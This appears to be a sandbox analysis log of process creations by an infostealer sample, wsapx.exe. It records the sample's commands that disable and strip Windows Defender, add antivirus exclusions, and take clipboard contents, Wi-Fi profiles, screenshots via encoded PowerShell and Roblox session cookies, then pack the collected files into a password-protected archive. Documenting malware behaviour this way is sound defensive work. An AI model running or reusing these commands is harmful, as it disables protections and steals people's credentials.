              Source: C:\Users\user\Desktop\wsapx.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
              Source: C:\Users\user\Desktop\wsapx.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -AllJump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeProcess created: C:\Users\user\Desktop\wsapx.exe "C:\Users\user\Desktop\wsapx.exe"Jump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"Jump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"Jump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"Jump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"Jump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"Jump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"Jump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"Jump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"Jump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"Jump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"Jump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"Jump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"Jump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "netsh wlan show profile"Jump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "systeminfo"Jump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"Jump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIAJump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"Jump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"Jump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "getmac"Jump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"Jump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"Jump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"Jump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"Jump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"Jump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"Jump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"Jump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"Jump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "C:\Users\user\AppData\Local\Temp\_MEI73722\rar.exe a -r -hp"Logger1@12345" "C:\Users\user\AppData\Local\Temp\bALb7.zip" *"Jump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"Jump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "systeminfo"Jump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\wsapx.exe'Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSendJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -AllJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\mshta.exe mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Verify your permissions and try again.', 0, 'Access Denied', 48+16);close()"Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LISTJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic csproduct get uuid
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get name
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get name
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ??.scr'
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-Clipboard
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show profile
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\systeminfo.exe systeminfo
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIAB
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\uses4c50\uses4c50.cmdline"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\attrib.exe attrib -r C:\Windows\System32\drivers\etc\hosts
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES226F.tmp" "c:\Users\user\AppData\Local\Temp\uses4c50\CSCF61F15A833E5414089F1F2D7C06D86CA.TMP"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\getmac.exe getmac
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\attrib.exe attrib +r C:\Windows\System32\drivers\etc\hosts
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\_MEI73722\rar.exe C:\Users\user\AppData\Local\Temp\_MEI73722\rar.exe a -r -hp"Logger1@12345" "C:\Users\user\AppData\Local\Temp\bALb7.zip" *
              Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
              Source: C:\Users\user\Desktop\wsapx.exeProcess created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /c "powershell set-mppreference -disableintrusionpreventionsystem $true -disableioavprotection $true -disablerealtimemonitoring $true -disablescriptscanning $true -enablecontrolledfolderaccess disabled -enablenetworkprotection auditmode -force -mapsreporting disabled -submitsamplesconsent neversend && powershell set-mppreference -submitsamplesconsent 2 & "%programfiles%\windows defender\mpcmdrun.exe" -removedefinitions -all"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell set-mppreference -disableintrusionpreventionsystem $true -disableioavprotection $true -disablerealtimemonitoring $true -disablescriptscanning $true -enablecontrolledfolderaccess disabled -enablenetworkprotection auditmode -force -mapsreporting disabled -submitsamplesconsent neversend
              Source: C:\Users\user\Desktop\wsapx.exeProcess created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /c "powershell.exe -noprofile -executionpolicy bypass -encodedcommand jabzag8adqbyagmazqagad0aiabaaciadqakahuacwbpag4azwagafmaeqbzahqazqbtadsadqakahuacwbpag4azwagafmaeqbzahqazqbtac4aqwbvagwabablagmadabpag8abgbzac4arwblag4azqbyagkaywa7aa0acgb1ahmaaqbuagcaiabtahkacwb0aguabqauaeqacgbhahcaaqbuagcaowanaaoadqbzagkabgbnacaauwb5ahmadablag0algbxagkabgbkag8adwbzac4argbvahiabqbzadsadqakaa0acgbwahuaygbsagkaywagagmababhahmacwagafmaywbyaguazqbuahmaaabvahqadqakahsadqakacaaiaagacaacab1agiababpagmaiabzahqayqb0agkaywagaewaaqbzahqapabcagkadabtageacaa+acaaqwbhahaadab1ahiazqbtagmacgblaguabgbzacgakqanaaoaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaadgbhahiaiabyaguacwb1agwadabzacaapqagag4azqb3acaatabpahmadaa8aeiaaqb0ag0ayqbwad4akaapadsadqakacaaiaagacaaiaagacaaiab2ageacgagageababsafmaywbyaguazqbuahmaiaa9acaauwbjahiazqblag4algbbagwababtagmacgblaguabgbzadsadqakaa0acgagacaaiaagacaaiaagacaazgbvahiazqbhagmaaaagacgauwbjahiazqblag4aiabzagmacgblaguabgagagkabgagageababsafmaywbyaguazqbuahmakqanaaoaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagahqacgb5aa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagafiazqbjahqayqbuagcabablacaaygbvahuabgbkahmaiaa9acaacwbjahiazqblag4algbcag8adqbuagqacwa7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahuacwbpag4azwagacgaqgbpahqabqbhahaaiabiagkadabtageacaagad0aiabuaguadwagaeiaaqb0ag0ayqbwacgaygbvahuabgbkahmalgbxagkazab0aggalaagagiabwb1ag4azabzac4asablagkazwboahqakqapaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiab1ahmaaqbuagcaiaaoaecacgbhahaaaabpagmacwagagcacgbhahaaaabpagmacwagad0aiabhahiayqbwaggaaqbjahmalgbgahiabwbtaekabqbhagcazqaoagiaaqb0ag0ayqbwackakqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagagcacgbhahaaaabpagmacwauaemabwbwahkargbyag8abqbtagmacgblaguabgaoag4azqb3acaauabvagkabgb0acgaygbvahuabgbkahmalgbmaguazgb0acwaiabiag8adqbuagqacwauafqabwbwackalaagafaabwbpag4adaauaeuabqbwahqaeqasacaaygbvahuabgbkahmalgbtagkaegblackaowanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaacgblahmadqbsahqacwauaeeazabkacgakabcagkadabtageacaapagiaaqb0ag0ayqbwac4aqwbsag8abgblacgakqapadsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaywbhahqaywboacaakabfahgaywblahaadabpag8abgapaa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagac8alwagaegayqbuagqabablacaayqbuahkaiablahgaywblahaadabpag8abgbzacaaaablahiazqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaacgblahqadqbyag4aiabyaguacwb1agwadabzadsadqakacaaiaagacaafqanaaoafqanaaoaigbaaa0acganaaoaqqbkagqalqbuahkacablacaalqbuahkacablaeqazqbmagkabgbpahqaaqbvag4aiaakahmabwb1ahiaywblacaalqbsaguazgblahiazqbuagmazqbkaeeacwbzaguabqbiagwaaqblahmaia
